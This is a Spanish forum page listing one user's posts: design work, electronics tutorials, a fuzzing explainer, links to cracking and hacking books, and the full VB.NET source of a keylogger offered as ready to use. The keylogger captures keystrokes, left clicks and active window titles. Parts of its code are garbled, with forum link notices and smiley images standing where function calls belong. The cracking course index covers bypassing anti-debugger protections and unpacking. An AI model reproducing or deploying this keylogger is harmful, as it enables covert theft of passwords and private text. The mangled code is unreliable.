Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - dracko.rx

Páginas: [1] 2 3 4
1
Presentaciones / La vuelta!
« en: Octubre 27, 2014, 08:16:55 pm »
Buenas a todos, hace mucho que no pasaba por aca asique decidi dar un vistado a ver como andan las cosas, me llamo dracko.rx soy del viejo staff de underc0de. :)

2
Galería / Firma Underc0de
« en: Mayo 05, 2013, 11:02:17 pm »
Bueno hoy en mi tiempo libre hice una firma, si bien es bastante simple, llevo su tiempito hacerla. Espero que les guste.


3
Galería / Wallpaper para Underc0de
« en: Abril 25, 2013, 01:54:29 pm »
Llevo tiempo hacerlo, espero que les guste y sino espero criticas constructivas. Saludos


4
Galería / Otros diseños
« en: Abril 14, 2013, 11:18:33 pm »
Bueno aca les dejo algunos diseños, espero que les gusten y sino hagan criticas constructivas.








5
Galería / Diseños Wallpapers
« en: Abril 11, 2013, 12:39:22 am »
Bueno aca les subo una foto, espero que les guste.




6
C# - VB.NET / Keylogger Visual Basic .NET
« en: Septiembre 28, 2012, 12:37:25 pm »
Este recoje un gran variedad de teclas y obtiene el nombre de la ventana donde se esta escribiendo para mayor informacion y obtiene tambien clicks del mouse solo del boton Izquierdo.

Código: vb.net
  1. '------------------------------------|
  2. '|Keylogger profesional de Robokop   |
  3. '|Este codigo esta reservado         |
  4. '|Para uso personal su distribucion  |
  5. '|esta penada por la ley mexicana.   |
  6. '------------------------------------|
  7.  
  8. 'Este codigo ha sido escrito desde Cero en visual Studio .Net 2005
  9. 'Esta versión se encuentra libre de errores y con un warning que
  10. 'no eh podido corregir pero no hay problema porque funciona bien y utiliza apis nativas de Vb6
  11. 'Ya que en el .NET no he encontrado NameSPace de getAsyncKeyState xD
  12. 'Este codigo se ha baso en declaraciones para obtener corresponditenes nombres
  13. 'ya que se basa en la resta de 32767 para obtener los caracteres correctos.
  14. 'Por cierto fue un lio encontrar los numeros de cada letra ¬¬.
  15.  
  16. Option Strict Off
  17. Option Explicit On
  18. Imports VB = Microsoft.VisualBasic
  19. Friend Class Form1
  20.    Inherits System.Windows.Forms.Form
  21.    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
  22.    Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Integer) As Short
  23.    Private Declare Function GetForegroundWindow Lib "user32" () As Integer
  24.    Private Declare Function GetWindowText Lib "user32"  Alias "GetWindowTextA"(ByVal hwnd As Integer, ByVal lpString As String, ByVal cch As Integer) As Integer
  25.    Private Declare Function GetWindowTextLength Lib "user32"  Alias "GetWindowTextLengthA"(ByVal hwnd As Integer) As Integer
  26.    
  27.    Private LastWindow As String
  28.    Private LastHandle As Integer
  29.    Private dKey(255) As Integer
  30.    Private Const VK_SHIFT As Short = &H10s
  31.    Private Const VK_CTRL As Short = &H11s
  32.    Private Const VK_ALT As Short = &H12s
  33.    Private Const VK_CAPITAL As Short = &H14s
  34.    Private ChangeChr(255) As String
  35.    Private AltDown As Boolean
  36.    
  37.    Private Sub Form1_Load(ByVal eventSender As System.Object, ByVal eventArgs As System.EventArgs) Handles MyBase.Load
  38.         'Conversión de caracteres especiales....
  39.         ChangeChr(33) = "[RePag]"
  40.         ChangeChr(34) = "[AvPag]"
  41.         ChangeChr(35) = "[Fin]"
  42.         ChangeChr(36) = "[Inicio]"
  43.      
  44.         ChangeChr(45) = "[Insertar]"
  45.         ChangeChr(46) = "[Suprimir]"
  46.      
  47.       ChangeChr(48) = ")"
  48.       ChangeChr(49) = "!"
  49.       ChangeChr(50) = "@"
  50.       ChangeChr(51) = "#"
  51.       ChangeChr(52) = "$"
  52.       ChangeChr(53) = "%"
  53.       ChangeChr(54) = "^"
  54.       ChangeChr(55) = "&"
  55.       ChangeChr(56) = "*"
  56.       ChangeChr(57) = "("
  57.      
  58.       ChangeChr(186) = ";"
  59.       ChangeChr(187) = "="
  60.       ChangeChr(188) = ","
  61.       ChangeChr(189) = "-"
  62.       ChangeChr(190) = "."
  63.       ChangeChr(191) = "/"
  64.      
  65.       ChangeChr(219) = "["
  66.       ChangeChr(220) = "\"
  67.       ChangeChr(221) = "]"
  68.       ChangeChr(222) = "'"
  69.      
  70.      
  71.       ChangeChr(86) = ":"
  72.       ChangeChr(87) = "+"
  73.       ChangeChr(88) = "<"
  74.       ChangeChr(89) = "_"
  75.       ChangeChr(90) = ">"
  76.       ChangeChr(91) = "?"
  77.      
  78.       ChangeChr(119) = "{"
  79.       ChangeChr(120) = "|"
  80.       ChangeChr(121) = "}"
  81.       ChangeChr(122) = """"
  82.      
  83.      
  84.       ChangeChr(96) = "0"
  85.       ChangeChr(97) = "1"
  86.       ChangeChr(98) = "2"
  87.       ChangeChr(99) = "3"
  88.       ChangeChr(100) = "4"
  89.       ChangeChr(101) = "5"
  90.       ChangeChr(102) = "6"
  91.       ChangeChr(103) = "7"
  92.       ChangeChr(104) = "8"
  93.       ChangeChr(105) = "9"
  94.       ChangeChr(106) = "*"
  95.       ChangeChr(107) = "+"
  96.       ChangeChr(109) = "-"
  97.       ChangeChr(110) = "."
  98.       ChangeChr(111) = "/"
  99.  
  100.       ChangeChr(192) = "`"
  101.       ChangeChr(92) = "~"
  102.    End Sub
  103.    
  104.    Function TypeWindow() As Object
  105.       Dim svar As Object
  106.         'Funcion para saber el tipo de ventana y devolver el nombre.
  107.       Dim Handle_Renamed As Integer
  108.       Dim textlen As Integer
  109.       Dim WindowText As String
  110.         'Obtenemos el nombre de la vetana de fondo
  111.       Handle_Renamed = GetForegroundWindow
  112.       LastHandle = Handle_Renamed
  113.       textlen = GetWindowTextLength(Handle_Renamed) + 1
  114.      
  115.         WindowText = You are not allowed to view links. Register or Login(textlen) 'Obtenemos el espacio del nombre
  116.         svar = GetWindowText(Handle_Renamed, WindowText, textlen) 'Guardamos en la variable svar_
  117.         'El contenido del nombre
  118.       WindowText = VB.You are not allowed to view links. Register or Login(WindowText, Len(WindowText) - 1)
  119.         'Cuando se hace cambio de ventana se pasa un espacio y se pone un delimitador_
  120.         'con ese delimitador nos damos cuenta de que el nombre ya cambio .
  121.       If WindowText <> LastWindow Then
  122.             If Text1.Text <> "" Then Text1.Text = Text1.Text & vbCrLf & vbCrLf
  123.             'Separador que escrimos en el textbox
  124.          Text1.Text = Text1.Text & "==============================" & vbCrLf & WindowText & vbCrLf & "==============================" & vbCrLf
  125.             LastWindow = WindowText 'vemos ventana
  126.       End If
  127.    End Function
  128.    
  129.    Private Sub Timer1_Tick(ByVal eventSender As System.Object, ByVal eventArgs As System.EventArgs) Handles Timer1.Tick
  130.         Dim i As Object 'Timer que cada 5 milisegundos checa las pulsaciones de teclas...
  131.      
  132.         'cuando AlT se preciona.
  133.       If GetAsyncKeyState(VK_ALT) = 0 And AltDown = True Then
  134.          AltDown = False
  135.             Text1.Text = Text1.Text & "[ALT]"
  136.       End If
  137.      
  138.         'Obtenemos caracteres de la A a la Z
  139.         'Los obtenemos de una forma For To para Ahorrar codigo en especificar cada _
  140.         'caracter asi que llevamos desde el numero ascii de A hasta la Z_
  141.         'en mayuscula y miniscula
  142.       For i = You are not allowed to view links. Register or Login("A") To You are not allowed to view links. Register or Login("Z")
  143.  
  144.          If GetAsyncKeyState(i) = -32767 Then
  145.             TypeWindow()
  146.            
  147.                 If GetAsyncKeyState(VK_SHIFT) < 0 Then 'Shift
  148.                     If GetKeyState(VK_CAPITAL) > 0 Then
  149.                         Text1.Text = Text1.Text & You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(i))
  150.                         Exit Sub
  151.                     Else
  152.                         Text1.Text = Text1.Text & You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(i))
  153.                         Exit Sub
  154.                     End If
  155.                 Else
  156.                     If GetKeyState(VK_CAPITAL) > 0 Then 'Shift Izq
  157.                         Text1.Text = Text1.Text & You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(i))
  158.                         Exit Sub
  159.                     Else
  160.                         Text1.Text = Text1.Text & You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(i))
  161.                         Exit Sub
  162.                     End If
  163.                 End If
  164.            
  165.          End If
  166.       Next
  167.      
  168.         'Obtenemos numeros del 1 al 0 y signos con shift
  169.         '!"·$%&$%$$$··"·@@[email protected]€€36$%&$/$·$&&(/
  170.       For i = 48 To 57
  171.  
  172.          If GetAsyncKeyState(i) = -32767 Then
  173.             TypeWindow()
  174.            
  175.             If GetAsyncKeyState(VK_SHIFT) < 0 Then
  176.                     Text1.Text = Text1.Text & ChangeChr(i)
  177.                Exit Sub
  178.             Else
  179.  
  180.                Text1.Text = Text1.Text & You are not allowed to view links. Register or Login(i)
  181.                Exit Sub
  182.             End If
  183.            
  184.          End If
  185.       Next
  186.      
  187.      
  188.         'Obtenemos los signos donde estan los numeros en la parte derecha del teclado...
  189.       For i = 186 To 192
  190.  
  191.          If GetAsyncKeyState(i) = -32767 Then
  192.             TypeWindow()
  193.            
  194.             If GetAsyncKeyState(VK_SHIFT) < 0 Then
  195.                     'Negacion-
  196.                Text1.Text = Text1.Text & ChangeChr(i - 100)
  197.                Exit Sub
  198.             Else
  199.                     Text1.Text = Text1.Text & ChangeChr(i)
  200.                Exit Sub
  201.             End If
  202.            
  203.          End If
  204.       Next
  205.      
  206.      
  207.       '[\]'
  208.       For i = 219 To 222
  209.  
  210.          If GetAsyncKeyState(i) = -32767 Then
  211.             TypeWindow()
  212.            
  213.             If GetAsyncKeyState(VK_SHIFT) < 0 Then
  214.  
  215.                Text1.Text = Text1.Text & ChangeChr(i - 100)
  216.                Exit Sub
  217.             Else
  218.  
  219.                Text1.Text = Text1.Text & ChangeChr(i)
  220.                Exit Sub
  221.             End If
  222.            
  223.          End If
  224.       Next
  225.      
  226.         'Diferentes posiciones de Alt en el teclado.<img src="https://underc0de.org/foro/Smileys/default/tongue.gif" alt="&#58;P" title="Lengua" class="smiley" />
  227.         'Por cierto ya casi acabamos.
  228.       For i = 96 To 111
  229.  
  230.          If GetAsyncKeyState(i) = -32767 Then
  231.             TypeWindow()
  232.            
  233.             If GetAsyncKeyState(VK_ALT) < 0 And AltDown = False Then
  234.                AltDown = True
  235.                     Text1.Text = Text1.Text & "[ALT-abajo]"
  236.             Else
  237.                If GetAsyncKeyState(VK_ALT) >= 0 And AltDown = True Then
  238.                   AltDown = False
  239.                         Text1.Text = Text1.Text & "[ALT-arriba]"
  240.                End If
  241.             End If
  242.            
  243.  
  244.             Text1.Text = Text1.Text & ChangeChr(i)
  245.             Exit Sub
  246.          End If
  247.       Next
  248.      
  249.         'Barra de Espacio y dejamos un espacio en el text
  250.       If GetAsyncKeyState(32) = -32767 Then
  251.          TypeWindow()
  252.          Text1.Text = Text1.Text & " "
  253.       End If
  254.      
  255.         'Enter
  256.       If GetAsyncKeyState(13) = -32767 Then
  257.          TypeWindow()
  258.          Text1.Text = Text1.Text & "[Enter]"
  259.       End If
  260.      
  261.         'Retroceso
  262.       If GetAsyncKeyState(<img src="https://underc0de.org/foro/Smileys/default/cool.gif" alt="8&#41;" title="Cool" class="smiley" /> = -32767 Then
  263.          TypeWindow()
  264.             Text1.Text = Text1.Text & "[Retroceso]"
  265.       End If
  266.      
  267.         'Flecha Izq
  268.       If GetAsyncKeyState(37) = -32767 Then
  269.          TypeWindow()
  270.             Text1.Text = Text1.Text & "[FlechaIzq]"
  271.       End If
  272.         '----Flechas---------
  273.         'Flecha arriba
  274.       If GetAsyncKeyState(38) = -32767 Then
  275.          TypeWindow()
  276.             Text1.Text = Text1.Text & "[FlechaArriba]"
  277.       End If
  278.      
  279.         'Flecha derecha
  280.       If GetAsyncKeyState(39) = -32767 Then
  281.          TypeWindow()
  282.             Text1.Text = Text1.Text & "[FlechaDer]"
  283.       End If
  284.      
  285.         'Flecha abajo
  286.       If GetAsyncKeyState(40) = -32767 Then
  287.          TypeWindow()
  288.             Text1.Text = Text1.Text & "[FlechaAbajo]"
  289.       End If
  290.         'Fin de flechas--------
  291.  
  292.         'Tabulador  ------>
  293.         '           <------
  294.       If GetAsyncKeyState(9) = -32767 Then
  295.          TypeWindow()
  296.             Text1.Text = Text1.Text & "[Tabulador]"
  297.       End If
  298.      
  299.       'escape
  300.       If GetAsyncKeyState(27) = -32767 Then
  301.          TypeWindow()
  302.          Text1.Text = Text1.Text & "[Escape]"
  303.       End If
  304.      
  305.         'Intertar y suprimir
  306.       For i = 45 To 46
  307.  
  308.          If GetAsyncKeyState(i) = -32767 Then
  309.             TypeWindow()
  310.                 Text1.Text = Text1.Text & ChangeChr(i)
  311.          End If
  312.       Next
  313.      
  314.         'Pagina arriba , pagina abajo ,home y End
  315.       For i = 33 To 36
  316.             '
  317.          If GetAsyncKeyState(i) = -32767 Then
  318.             TypeWindow()
  319.                 Text1.Text = Text1.Text & ChangeChr(i)
  320.          End If
  321.       Next
  322.      
  323.         'Click izquierdo
  324.       If GetAsyncKeyState(1) = -32767 Then
  325.             If (LastHandle = GetForegroundWindow) And LastHandle <> 0 Then 'Nos aseguramos que el click fue en la pagina vista
  326.                 Text1.Text = Text1.Text & "[ClickIzq]"
  327.             End If
  328.       End If
  329.      
  330.    End Sub
  331.  
  332.     Private Sub Text1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Text1.TextChanged
  333.  
  334.     End Sub
  335. End Class
  336.  
  337.  


Necesita un Timer de intervalo con 5 , puede ser menos pero yo lo probe con ese.
Este codigo fue probado con la versión Visual Studio 2005 Libre de errores y con un solo warning pero funciona sin problemas.

7
Electrónica y Robótica / Leyes de Kirchhoff
« en: Septiembre 22, 2012, 05:01:38 pm »
En esta ocasión hablaremos de dos leyes muy útiles en el análisis de circuitos. Estas leyes són: ley de nodos o de las corrientes y ley de mallas o de las tensiones.
Primera ley de Kirchhoff o ley de las corrientes
La suma algebraica de todas las intensidades que llegan a un nodo es igual a la suma algebraica de todas las intensidades que se alejan del nodo.



Fijaros en la figura de arriba donde tenemos I1,I2 que llegan al nodo y I3,I4 que se alejan del nodo.Si adoptamos que es positiva(+) las corrientes que llegan y negativas(-) las corrientes que se alejan, se puede escribir esta ecuación.

I1+I2-I3-I4=0


Donde se deduce que:la suma algebraica de todas las intensidades que concurren en un nodo es igual a cero.

Segunda ley de Kirchhoff o ley de las tensiones

En toda malla o circuito cerrado,la suma algebraica de todas las fem debe ser igual a la suma algebraica de la caida de tensión en todas las resistencias intercaladas a lo largo de aquella malla o circuito cerrado.



En el circuito de arriba tenemos que V3=V1+V2

Recordemos la diferencia que hay entre fem y caida de tensión o ddp (V=RxI).

La fem es producida en una fuente de tensión y proviene de la generación de electricidad por cualquier prodecimiento.La caida de tensión o voltaje es generada a través de una resistencia y viene dada por RxI.Las caidas de voltaje son negativas donde se deduce que:la suma algebraica de las tensiones a lo largo de una malla o contorno es cero.

Saludos.

8
Electrónica y Robótica / Tester de continuidad
« en: Septiembre 22, 2012, 04:55:39 pm »
En esta publicación les presento un interesante proyecto muy fácil de hacer y práctico, que nos permitira comprobar continuidad en pistas de circuitos y cables, por decir alguna de las utilidades que le podes dar al instrumento.

Esquema eléctrico




Lista de componentes

Resistencias (todas de 1/4 w)
1 10k ohmios
2 330 "
1 1k "
1 100k "
1 22k "

Semiconductores
1 555 (timer)
1 hcf4093b (NAND de dos entradas schmitt trigger)
1 led 5mm verde
1 led 5mm rojo

Condensadores
2 10nf

Varios
1 Buzzer polarizado
2 pinzas cocodrilo y cable rojo negro
1 Conector para pila de 9v



Funcionamiento del circuito

Tenemos un sistema de visualización formado por dos led, uno rojo y el otro verde. Estos dos led's estan controlados por un flip-flop r-s hecho con compuertas NAND, estas puertas esta integradas en el HEF4093B.



Luego el timer 555 esta configurado como astable que genera una frecuencia audible cuando el material en prueba es conductor.

Entremos un poco mas en detalle del funcionamiento del circuito. Fijaros en el esquema que hay dos resistencia en serie formando un divisor de tensión resistivo por R3 y R4, en paralelo con R4 hay un punto abierto que es donde se conectara el objeto para saber si es aislante o conductor.


Si es aislante la tensión Vcc se reparte entre R3 y R4, pero como la resistencia R4 es mucho mayor que R3, casi toda la tensión recae en R4, esto se traduce en un nivel lógico(1) que es aplicado al flip-flop r-s formado por las compuertas NAND, esto hace que se mantenga en estado reset y activa el led rojo, el led verde permanece apagado. Por otro lado el timer 555 esta desactivado ya que la patilla 1 que debe estar a tierra esta a un potencial positivo y permanece apagado. En resumen, en esta condición el led rojo permanece encendido y no hay sonido, indicando que el material es aislante.


En la condición de continuidad cuando cerramos el circuito , el punto de unión de la resistencia R3 y R4 queda a tierra, esto se traduce en un nivel lógico (0) que es aplicado al flip-flop r-s haciendolo bascular de su estado reset a set , el led verde se activa y al mismo tiempo pone a tierra al terminal 1 del timer 555, produciendo un sonido en el buzzer. En resumen, en esta condición el led verde permanece encendido y produciendo un sonido indicando que hay continuidad.

Espero que les sirva, Saludos.

9
Electrónica y Robótica / Sonda lógica con display 7 segmentos TTL
« en: Septiembre 22, 2012, 04:49:59 pm »
Sonda lógica con display 7 segmentos TTL



La sonda lógica es un instrumento de suma utilidad cuando hay que analizar circuitos digitales.Como la mayoría de nosotros ya saben, los circuitos digitales solo trabajan con dos estados o niveles de tensión. Si hablamos de lógica TTL (lógica transistor-transistor) la tensión booleana para el 1 lógico es de +5v y para el 0 lógico es 0v, esta sonda es para analizar circuitos del tipo TTL.


Este es el diagrama eléctricos de la sonda.



Lista de materiales

1 ic7404
1 Display 7 segmentos de ánodo común
1 transistor NPN 2N3904
1 Resistencia 1k
1 Resistencia 10k
1 Resistencia de 470
5 Resistencias de 220
1 Base ic 14 pines
2 Pinzas de cocodrilo roja y negra
1 Punta
cable rojo y negro



Para el chasis del circuito yo he utilizado una funda de plástico de CD.


Funcionamiento del circuito.

El circuito esta dividido en dos partes marcadas como H y L. La etapa H indica una condición alta (1 lógico), la forman las resistencia R2,R3 y R8, el transistor Q1 y los inversores D y E del circuito IC 7404.

La etapa L indica una condición baja (0 lógico), la forman las resistencias R1,R4,R5,R6 y R7 y los inversores A,B y C del circuito IC 7404.



Los inversores B y C forman un buffer de corriente. Su salida controla los segmentos a,b,g y f del display. Cuando este punto es bajo los leds de estos segmentos se iluminan, mostrando un cero en el display. En resumen, cuando se aplica un bajo (0 voltios) a la entrada el inversor A recibe un bajo a través de R1, entrega un alto al buffer C,D y este suministra un bajo a los segmentos a,b,g y f a través de R4,R5,R6 y R7.



Los inversores D y E forman también un buffer de corriente, su salida controla el segmento e del display. Cuando ese punto es bajo, por efecto de un alto en la entrada, el led de este segmento se ilumina, mostrando un 1 en el display. En resumen, cuando se aplica un alto en la entrada el transistor q1 recibe un alto en su base a través de la resistencia R2 y conduce, aplicando un alto a la entrada del buffer C,D. Este último suministrar un bajo al segmento e del display.



Cuando se aplica un tren de impulsos a la entrada, se suceden alternativamente los dos casos expuestos, iluminando los segmentos a,b,e,f y g y el display muestra la letra P, que significa pulsos.



Como pueden apreciar es un montaje fácil, práctico y muy útil!!!

Saludos.

10


Python se está convirtiendo en el lenguaje de programación elegido por muchos que se dedican al hacking, a la ingeniería inversa y a probar software. La razón principal es que es fácil y rápido de escribir, soporta bajo nivel y tiene bibliotecas que nos hacen felices.

Ya no tendremos que buscar siempre en foros y manuales, Gray Hat Python muestra el uso de Python para una amplia variedad de tareas de hacking. Este libro explica los conceptos detrás de las herramientas de hacking y las técnicas con depuradores, troyanos, fuzzers y emuladores. Pero el autor, Justin Seitz, va más allá de la teoría mostrando cómo aprovechar las herramientas existentes de seguridad basadas en Python - y cómo construir las tuyas propias cuando lo necesites.

Leyendo este libro aprenderas a:

* Automatizar las tediosas tareas de ingeniería inversa y seguridad
* Diseñar y programar tu propio depurador
* Fuzzear drivers de Windows y a crear potentes fuzzers desde el principio
* Divertirte con la inyección de código y librerías, técnicas de soft y hard hooking y otros trucos con software
* Esnifar tráfico seguro de sesión web cifrada
* Usar PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU y más






You are not allowed to view links. Register or Login


Espero que les sirva y les guste.

Saludos dracko.rx

11
C / C++ / Tutorial de iniciación al lenguaje C
« en: Junio 28, 2012, 05:26:17 pm »



Les dejo un tutorial sobre el lenguaje C. Espero que les guste.



You are not allowed to view links. Register or Login

12
Ingeniería Inversa / Introduccion al cracking con ollydbg desde cero
« en: Junio 27, 2012, 07:29:47 pm »
Tutorial completo sobre cracking con ollydbg.

Contiene 48 partes, los temas son los siguientes:

PARTE 001  -  CONOCIENDO A OLLYDBG - INSTALACION
PARTE 002  -  SISTEMAS NUMERICOS - NUMEROS POSITIVOS - NEGATIVOS - CARACTERES ASCII - QUE ES EL STACK
PARTE 003  -  REGISTROS Y FLAGS
PARTE 004  -  INSTRUCCIONES DE ASSEMBLER -  NOP, PUSH, POP, PUSHAD, POPAD, MOV, MOVSX, MOVZX, LEA, XCHG,
PARTE 005  -  INSTRUCCIONES MATEMATICAS - INC, DEC, ADD, ADC, SUB, SBB, MUL, IMUL, DIV, IDIV, XADD, NEG
                         INSTRUCCIONES LOGICAS - AND, XOR, OR, NOT -
PARTE 006  -  INSTRUCCIONES - COMPARACIONES Y SALTOS CONDICIONALES
PARTE 007  -  INSTRUCCIONES - CALL Y RET
PARTE 008  -  INSTRUCCIONES PARA LOOPS O CICLOS (BUCLES)
PARTE 009  -  PRIMERA APROXIMACION AL CRACKING - CRACKME DE CRUEHEAD
PARTE 010  -  BREAKPOINTS - BP COMUNES, ON MEMORY
PARTE 011  -  BREAKPOINTS - HARDWARE BREAKPOINTS - BP CONDICIONALES
PARTE 012  -  LOS MENSAJES DE WINDOWS - COLOCANDO BP EN LOS MENSAJES DE WINDOWS
PARTE 013  -  PEZCANDO Y REVIRTIENDO SERIALES
PARTE 014  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 015  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 016  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS
PARTE 017  -  PEZCANDO Y REVIRTIENDO SERIALES - HARCODED SERIALS - BUSCANDO EL SERIAL EN LA MEMORIA (CUANDO NO TENEMOS BOTON CHECK)
PARTE 018  -  PEZCANDO Y REVIRTIENDO SERIALES - BUSCANDO EL SERIAL EN LA MEMORIA (CUANDO NO TENEMOS BOTON CHECK)
PARTE 019  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - api: IsDebuggerPresent -
PARTE 020  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - POR NOMBRE DEL PROCESO - api: EnumProcesses
PARTE 021  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - POR NOMBRE DEL PROCESO - POR NOMBRE O CLASE DE LA VENTANA - api: CreateToolhelp32Snapshot, Process32First, Process32Next, FindWindowA
PARTE 022  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - apis: UnhandeldExceptionFilter - ZwQueryInformationProcess
PARTE 023  -  PROTECCIONES ANTIDEBUGGER - COMO EVITARLAS MANUALMENTE Y CON PLUGINS - ProcessHeapFlag  y  NTGlobalFlag
PARTE 024  -  PROTECCIONES ANTIDEBUGGER - Resolviendo el Antisocial de la parte 23
PARTE 025  -  EXCEPCIONES
PARTE 026  -  CRACKEANDO VISUAL BASIC - NAGS

PARTE 027  -  CRACKEANDO VISUAL BASIC - NAGS, METODO DEL 4C
PARTE 028  -  CRACKEANDO VISUAL BASIC - INJERTAR EN DLL (MODIFICARLA)
PARTE 029  -  CRACKEANDO VISUAL BASIC - P-CODE
PARTE 030  -  CRACKEANDO VISUAL BASIC - P-CODE 2DA PARTE
PARTE 031  -  UNPACKING - NICIONES BASICAS
PARTE 032  -  UNPACKING - BUSCAR OPCODES, BUSCADOR DE OEP DE OLLY, METODO PUSHADD, METODO EXCEPCIONES, METODO API MUY USADA,
         METO PRIMERA API EJECUTADA
PARTE 033  -  UNPACKING - QUE ES IAT Y COMO REPARARLA
PARTE 034  -  UNPACKING - CON AYUDA DE PE TOOLS, IMPREC
PARTE 035  -  UNPACKING - CON OLLYDUMP, IMPREC  (EJEMPLO ASPACK)
PARTE 036  -  UNPACKING - CON OLLYDUMP, IMPREC  (OTRO EJERCICIO PRACTICO)
PARTE 037  -  UNPACKING - REPARAR ENTRADAS REDIRECCIONADAS
PARTE 038  -  UNPACKING - REPARAR ENTRADAS REDIRECCIONADAS
PARTE 039  -  STOLEN BYTES Y SCRIPTS
PARTE 040  -  SCRIPTS   (DESEMPACADO DEL PELOCK)
PARTE 041  -  SCRIPTS   (CONT. DESEMPACADO DEL PELOCK)
PARTE 042  -  UNPACKING - STOLEN BYTES (ACPROTECT 1.09)
PARTE 043  -  UNPACKING - REPARAR STOLEN BYTES (ACPROTECT 1.09)
PARTE 044  -  UNPACKING - REPARAR IAT - SCRIPTS (ACPROTECT 1.09)
PARTE 045  -  UNPACKING - REPARAR IAT - DUMPEADO (ACPROTECT 1.09)
PARTE 046  -  UNPACKING - FATMIKE
PARTE 047  -  UNPACKING - FATMIKE (2DA PARTE)
PARTE 048  -  UNPACKING - PESPIN 1.304





You are not allowed to view links. Register or Login

Fuente: Ricardo Navaja

13
Dudas y pedidos generales / [SOLUCIONADO] Misteriosa página 8-3-11
« en: Julio 26, 2011, 07:19:34 pm »
Bueno ayer hablando de varios temas con mi novia me conto que habia visto en la televicion una noticia sobre esta mistoriosa pagina de internet que salio, llamada You are not allowed to view links. Register or Login .. Busque por muchos lados en la Red pero nadie supo decirme que es concretamente y para que sirve..

Una de las curiosidades que vi en la pagina es que Copyfight en vez de Copyright ..

La verdad que me intriga mucho saber que es y para que esta esa web.. Si Alguien sabe del tema me gustaria que lo comenten.

Saludos, Dracko.rx

14
Bugs y Exploits / ¿Qué son los Fuzzers?
« en: Febrero 25, 2010, 11:55:40 am »
¿Fuzzing, Fuzzers que es todo esto?
 
  [idea] Para comenzar, diremos que se conoce como “Fuzzing” a las diferentes técnicas de software automatizadas, capaces de generar y enviar datos secuenciales o aleatorios a una o varias áreas o puntos de una aplicación, con el objeto de detectar defectos o vulnerabilidades existentes en el software auditado.
 
 [idea] Las herramientas con capacidad de “Fuzzing”, a menudo son conocidas como “Fuzzers”, y dependiendo de la implementación que cada una de estas herramientas haga de las técnicas de “Fuzzing”, es probable que existan tipos que se ajusten mejor a cada una de las diferentes necesidades del researcher o profesional a cargo del testing (Protocolos / Networking, Application / WebApplication, etc.).

 [idea] Si bien es cierto que el concepto de “Fuzzing” es de ámbito general de acuerdo a lo mencionado, quizás no sea mala idea el que conozcas como funciona cada una de las herramientas a tu alcance, antes de decidir su tilización en alguno de tus proyectos personales.

 [idea] Pero imagino que probablemente exista quien aún no haya entendido a lo que me estoy refiriendo, por tanto me permitiré tomar el siguiente ejemplo: Supongamos que necesitamos conocer si una aplicación en particular posee algún tipo de Buffer Overflow, a fin de detectar este tipo de situación, un tester sencillamente podría generar datos de distintos tamaños y enviar estos a uno de los puntos de entrada existentes en la aplicación, con el objeto de observar su comportamiento ante estas pruebas o mejor dicho como estos requerimientos son manejados. Si el programa a testear falla en tal menester, esto significara dos cosas: que hay defectos que corregir, y que probablemente sea posible explotar la falla.
 
 [idea] De acuerdo a lo mencionado hasta aquí, podemos inferir que el principal uso del Fuzzing, es el de testear software (servicios, protocolos, aplicaciones, etc.) con el objeto de encontrar defectos de desarrollo o implementación. Este testing no solo puede (y debe) ser llevado a cabo como parte del ciclo de vida de un desarrollo, sino que también comprende un método excelente de testeo a ser aplicado como parte de pentest del tipo “BlackBox”. Debido a su relativa sencillez, estas técnicas a menudo poseen una relación costo beneficio altamente efectiva. A pesar de esto, el Fuzzing no reemplaza el testing manual o los métodos tradicionales de testeo de software y QA, este solo podrá proveernos de una serie de pruebas aleatorias que podrían mostrarnos solo una parte del
problema.

  Fuzzing de Protocolos
 
 [idea] El “Fuzzing” de protocolos, no es muy diferente al “Fuzzing” de aplicación. Cada protocolo posee su propio set de parámetros y una estructura que a menudo puede ser testeada. Los “Fuzzers” basan parte de su tarea en la ventaja que les brinda el conocer exactamente como “debería” funcionar determinado protocolo basándose en los RFCs relacionados a tal o cual de ellos. De este modo, el Fuzzer sabe que debe esperar de cada una de las pruebas a las que someterá al protocolo a testear (o mejor dicho su implementación) y podrá alertar al tester cuando encuentre una respuesta que no ha podido ser manejada o ha sido manejada erróneamente.
 
 [idea] Pero ¿como hace realmente un Fuzzer para llevar a cabo su tarea? a fin de ejemplificar su operatoria, me basaré de un ejemplo que oportunamente publicara Sacha Faust, de You are not allowed to view links. Register or Login  en un excelente paper que aprovecho a recomendar desde aquí, el cual se denomina “Web Application Testing with SPI Fuzzer”. 
 
 [idea] Cuando se trabaja con fuzzing sobre HTTP, generalmente se intenta testear al menos cada uno de los siguientes aspectos del protocolo o su implementación:

 [idea] Para que quede un tanto mas claro, la idea detrás del fuzzing de protocolo http en este ejemplo, es básicamente la de parsear cada uno de los aspectos que componen el protocolo y testear mediante la generación de determinados requerimientos, cada uno de estos componentes en forma individual, a fin de  identificar el modo en que la implementación maneja las excepciones o inclusive la alteración de tráfico real.
 
 [idea] El request HTTP citado a continuación, corresponde a un requerimiento real hecho por un browser a un sitio web determinado. Las partes dispuestas en color rojo, representan algunos de los datos/campos que tal como mencionáramos en el párrafo anterior podrían ser sometidos a “Fuzzing” en forma individual, a fin de observar su comportamiento:

  El primer Acercamiento: Fuzzer 1.1
 
 [idea] Bien, ahora que conoces conceptualmente alguno de los aspectos más importantes en torno al Fuzzing, creo que es hora de dar nuestros primeros pasos en la utilización de alguna herramienta que implemente este tipo de técnicas.
 
